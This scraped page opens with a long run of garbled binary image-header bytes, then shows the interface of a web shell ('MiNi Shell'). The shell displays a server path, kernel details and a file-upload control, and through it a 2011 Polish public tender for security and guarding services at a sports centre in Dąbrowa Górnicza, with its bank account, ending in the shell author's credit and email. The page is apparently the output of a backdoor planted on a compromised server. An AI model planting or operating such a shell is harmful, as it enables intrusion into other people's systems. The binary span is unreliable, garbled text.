JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111121/302831-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Usługi ochrony imprez sportowych i rekreacyjnych oraz dozorowania obiektów Centrum Sportu i Rekreacji w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 302831 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Sportu i Rekreacji w Dąbrowie Górniczej , ul. Marii Konopnickiej 29, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2612010, 2612402, faks 032 2612010, 2612402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csir.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony imprez sportowych i rekreacyjnych oraz dozorowania obiektów Centrum Sportu i Rekreacji w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z dwóch części:
Część I. Usługi ochrony imprez sportowych i rekreacyjnych CSiR.
1 .Usługi te realizowane będą na obiektach sportowych i rekreacyjnych Centrum Sportu i Rekreacji na terenie Gminy Dąbrowa Górnicza i obejmować będą w szczególności udział służb porządkowych oraz informacyjnych podczas:
a) Meczy ligowych koszykówki mężczyzn rozgrywanych na Hali Widowiskowo - Sportowej Centrum w Dąbrowie Górniczej przy al. Róż 3, będących imprezami masowymi w rozumieniu ustawy z dn. 20 marca 2009 r. o bezpieczeństwie imprez masowych (Dz. U. Z 2009 r. nr 62 poz. 504 ze zm.),
b) Innych imprez sportowych i rekreacyjnych masowych oraz nie będących imprezami masowymi organizowanych przez Zamawiającego na ww. hali oraz innych obiektach sportowych i rekreacyjnych Zamawiającego wg bieżącego zapotrzebowania.
Usługi wykonywane będą zgodnie z następującymi aktami prawnymi:
a) Ustawą z dnia 20 marca 2009 r. o bezpieczeństwie imprez masowych (Dz. U. Z 2009 r. nr 62 poz. 504 ze zm.).
b) Rozporządzeniem Rady Ministrów z dnia 30 sierpnia 2011 w sprawie wymogów jakie powinni spełniać kierownik ds bezpieczeństwa, służby porządkowe i służby informacyjne (Dz. U. z 2011 r. nr  183 poz. 1087),
c) Innymi przepisami dotyczącymi bezpieczeństwa imprez masowych.
2. Usługi w zakresie ochrony fizycznej imprez sportowych i rekreacyjnych realizowane będą przez:
a) służby porządkowe - o których mowa w art. 3 pkt. 13 ustawy z dnia 20 marca 2009 o bezpieczeństwie imprez masowych, tj. osoby podlegające kierownikowi do spraw bezpieczeństwa, wyznaczone przez organizatora, legitymujące się ważną licencją pracownika ochrony fizycznej, o której mowa w art. 26 lub 27 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.),
b) służby informacyjne - o których mowa w art. 3 pkt. 12 ustawy z dnia 20 marca 2009 o bezpieczeństwie imprez masowych, tj. osoby podlegające kierownikowi do spraw bezpieczeństwa, wyznaczone przez organizatora, w tym spiker zawodów sportowych.
Osoby wykonujące funkcje służb porządkowych oraz służb informacyjnych winny spełniać wymagania w zakresie wyszkolenia oraz wyposażenia zgodnie z ustawą z dnia 20 marca 2009 r. o bezpieczeństwie imprez masowych (Dz. U. Z 2009 r. nr 62 poz. 504 ze zm.) oraz Rozporządzenia Rady Ministrów z dnia 30 sierpnia 2011 w sprawie wymogów jakie powinni spełniać kierownik ds bezpieczeństwa, służby porządkowe i służby informacyjne (Dz. U. Z 2011 r. nr  183 poz. 1087) oraz posiadać ważną licencję pracownika ochrony fizycznej, o której mowa w pkt. 2 lit. a powyżej, a także ukończone szkolenie, o którym mowa w § 2 i 3 ww. rozporządzenia.
Zakres zamówienia obejmujący usługi ochrony fizycznej imprez sportowych i rekreacyjnych wynosi 5500 ( słownie: pięć tysięcy pięćset) roboczogodzin, w tym:
a) udział służb porządkowych wynosi 2750 (słownie: dwa tysiące siedemset pięćdziesiąt) roboczogodzin,
b) udział służb informacyjnych wynosi 2750 (słownie: dwa tysiące siedemset pięćdziesiąt) roboczogodzin.
Część II. Usługi dozorowania obiektów CSiR.
Usługi te realizowane będą na obiektach sportowych i rekreacyjnych Centrum Sportu i Rekreacji na terenie Gminy Dąbrowa Górnicza i obejmować będą w szczególności dozorowanie obiektów:
1.Eurocamping w Dąbrowie Górniczej - Błędowie ul. Żołnierska 130.
2.Stadion sportowy oraz biuro przy ul. Konopnickiej 29 w Dąbrowie Górniczej.
3.Centrum Sportów Letnich i Wodnych Park Zielona.
4.Centrum Sportów Letnich i Wodnych Pogoria III.
5.Ośrodek nad jez. Pogoria I ul. Żeglarska 34.
6.Inne obiekty CSiR wg zapotrzebowania.
Przedmiotem niniejszych usług jest dozorowanie mienia znajdującego się na danym obiekcie przed kradzieżą, zniszczeniem, dewastacją, nieuprawnionym dostępem, podłożeniem ognia itp. 
Dozorowanie będzie realizowane poprzez pełnienie dyżurów na terenie dozorowanego obiektu przez uprawnione osoby, którymi dysponuje Wykonawca. 
Zamawiający wymaga, aby osoby wykonujące funkcje dozorowania posiadały odpowiednie przeszkolenie oraz jednolite umundurowanie.
Zakres zamówienia związany z usługami dozorowania obiektów  wynosi 16000 (szesnaście tysięcy) roboczogodzin..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania o udzielenie zamówienia jest zobowiązany wnieść wadium w wysokości będącej sumą wadiów przypadających na odpowiednie części zamówienia, na które składana jest oferta, tj. :
Część I. Usługi ochrony imprez sportowych i rekreacyjnych CSiR: 1000,00 zł., słownie: jeden tysiąc  złotych 00/100.
Część II. Usługi dozorowania obiektów CSiR: 1000,00 zł., słownie: jeden tysiąc  złotych 00/100. 
Wykonawcy,  którzy  nie  wniosą  wadium,  w  tym  również  na przedłużony  okres  związania  ofertą  lub  nie  zgodzą  się  na przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych).
Forma wadium:
Wadium może być wniesione w jednej lub kilku następujących formach:
1.pieniądzu,
2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.gwarancjach bankowych,
4.gwarancjach ubezpieczeniowych,
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1.nazwę dającego zlecenie (Wykonawcy), nazwę beneficjenta gwarancji (Zamawiającego), nazwę gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,
2.określenie wierzytelności, która ma być zabezpieczona gwarancją,
3.kwotę gwarancji,
4.termin ważności gwarancji,
5.zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie że:
a) Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach określonych  w ofercie,
b) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Miejsce i sposób wniesienia wadium:
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: Getin Bank konto nr 46 1560 0013 2557 1237 1226 0012, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy z załączonego do oferty dokumentu wynikać będzie, że bank Zamawiającego otrzymał taki przelew przed upływem terminu składania ofert.
W przypadku wadium wnoszonego w innej formie, do oferty należy dołączyć oryginał dokumentu lub kserokopię potwierdzoną za zgodność z oryginałem przez osoby uprawnione do występowania w imieniu wykonawcy.
Ważność wadium w formie niepieniężnej winna obejmować okres 30 dni od dnia  29.11.2011 r.
Termin wniesienia wadium:
Wadium należy wnieść przed upływem terminu składania ofert, określonym w pkt. 18 SIWZ.
Dokumenty, o których mowa w pkt 11.2.2., pkt 11.2.3. i pkt 11.2.4. SIWZ muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 5 Ustawy, przy czym w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich.
Zwrot wadium:
Zamawiający zwróci niezwłocznie wadium zgodnie z zasadami określonymi w art. 46 Ustawy.
Utrata wadium:
Utrata wadium nastąpi zgodnie z art. 46 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla obu części postępowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek w celu wykazania jego spełniania winni udokumentować, że:
Posiadają aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I postępowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek w celu wykazania jego spełniania winni udokumentować, że:
W okresie ostatnich trzech lat przed dniem składania ofert, a jeśli okres działalności jest krótszy - w tym okresie, wykonali co najmniej dwa zamówienia odpowiadające rodzajem i wartością usługom stanowiącym przedmiot zamówienia, gdzie zostały one wykonane należycie

Zamawiający uzna, że zamówienie odpowiada rodzajowi przedmiotu zamówienia, jeśli obejmowało ono usługi wykonywane na podstawie ustawy z dn. 20.03.2009 r. o bezpieczeństwie imprez masowych.
Dla części II postępowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek potwierdzają jego spełnianie składając oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla obu części postępowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek potwierdzają jego spełnianie składając oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I postepowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek w celu wykazania jego spełniania winni udokumentować, że:
Dysponują co najmniej 30 osobami (w tym min. 2 obu płci), posiadającymi licencję pracownika ochrony fizycznej I lub II stopnia.
Dla części II postępowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek potwierdzają jego spełnianie składając oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla obu części postępowania:
Wykonawcy ubiegający się o udzielenie zamówienia spełniający ww. warunek w celu wykazania jego spełniania winni udokumentować, że:

Posiadają aktualną polisę od odpowiedzialności cywilnej w zakresie wykonywanej działalności obejmującą ubezpieczenie kontraktowe o wartości ubezpieczenia nie mniejszej niż 200 000,00 zł i deliktowe o wartości ubezpieczenia nie mniejszej niż 100 000,00 zł, dla jednej lub wielu szkód (jeśli suma ubezpieczenia wyrażona jest w innej walucie, dla potrzeb sprawdzenia spełniania warunku, zostanie przeliczona według kursu średniego NBP, obowiązującego na dzień składania ofert).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy - (wg wzoru załącznik nr 1 SIWZ) - wskazana data podpisania oferty.
2.Dowód wniesienia wadium jako potwierdzenie, że Wykonawca przystępujący do przetargu wywiązał się z obowiązku wniesienia wadium w wysokości i formie zgodnej z zapisem pkt 11 SIWZ.
3.Pełnomocnictwo do reprezentowania Wykonawców w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z zapisem punktu 10 SIWZ.
4.Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów (o czym mowa  w uwagach do pkt. 8 SIWZ) na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku kiedy takie zobowiązanie występuje.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.csir.pl        zakładka bip, zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Sportu i Rekreacji w Dąbrowie Górniczej ul. Konopnickiej 29, 41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2011 godzina 09:00, miejsce: Centrum Sportu i Rekreacji w Dąbrowie Górniczej ul. Konopnickiej 29, 41-300 Dąbrowa Górnicza - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi ochrony imprez sportowych i rekreacyjnych CSiR..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 .Usługi te realizowane będą na obiektach sportowych i rekreacyjnych Centrum Sportu i Rekreacji na terenie Gminy Dąbrowa Górnicza i obejmować będą w szczególności udział służb porządkowych oraz informacyjnych podczas:
a) Meczy ligowych koszykówki mężczyzn rozgrywanych na Hali Widowiskowo - Sportowej Centrum w Dąbrowie Górniczej przy al. Róż 3, będących imprezami masowymi w rozumieniu ustawy z dn. 20 marca 2009 r. o bezpieczeństwie imprez masowych (Dz. U. Z 2009 r. nr 62 poz. 504 ze zm.),
b) Innych imprez sportowych i rekreacyjnych masowych oraz nie będących imprezami masowymi organizowanych przez Zamawiającego na ww. hali oraz innych obiektach sportowych i rekreacyjnych Zamawiającego wg bieżącego zapotrzebowania.
Zakres zamówienia obejmujący usługi ochrony fizycznej imprez sportowych i rekreacyjnych wynosi 5500 ( słownie: pięć tysięcy pięćset) roboczogodzin, w tym:
a) udział służb porządkowych wynosi 2750 (słownie: dwa tysiące siedemset pięćdziesiąt) roboczogodzin,
b) udział służb informacyjnych wynosi 2750 (słownie: dwa tysiące siedemset pięćdziesiąt) roboczogodzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi dozorowania obiektów CSiR..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi te realizowane będą na obiektach sportowych i rekreacyjnych Centrum Sportu i Rekreacji na terenie Gminy Dąbrowa Górnicza i obejmować będą w szczególności dozorowanie obiektów:
1.Eurocamping w Dąbrowie Górniczej - Błędowie ul. Żołnierska 130.
2.Stadion sportowy oraz biuro przy ul. Konopnickiej 29 w Dąbrowie Górniczej.
3.Centrum Sportów Letnich i Wodnych Park Zielona.
4.Centrum Sportów Letnich i Wodnych Pogoria III.
5.Ośrodek nad jez. Pogoria I ul. Żeglarska 34.
6.Inne obiekty CSiR wg zapotrzebowania.
Przedmiotem niniejszych usług jest dozorowanie mienia znajdującego się na danym obiekcie przed kradzieżą, zniszczeniem, dewastacją, nieuprawnionym dostępem, podłożeniem ognia itp. 
Dozorowanie będzie realizowane poprzez pełnienie dyżurów na terenie dozorowanego obiektu przez uprawnione osoby, którymi dysponuje Wykonawca. 
Zamawiający wymaga, aby osoby wykonujące funkcje dozorowania posiadały odpowiednie przeszkolenie oraz jednolite umundurowanie.
Zakres zamówienia związany z usługami dozorowania obiektów  wynosi 16000 (szesnaście tysięcy) roboczogodzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.40.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com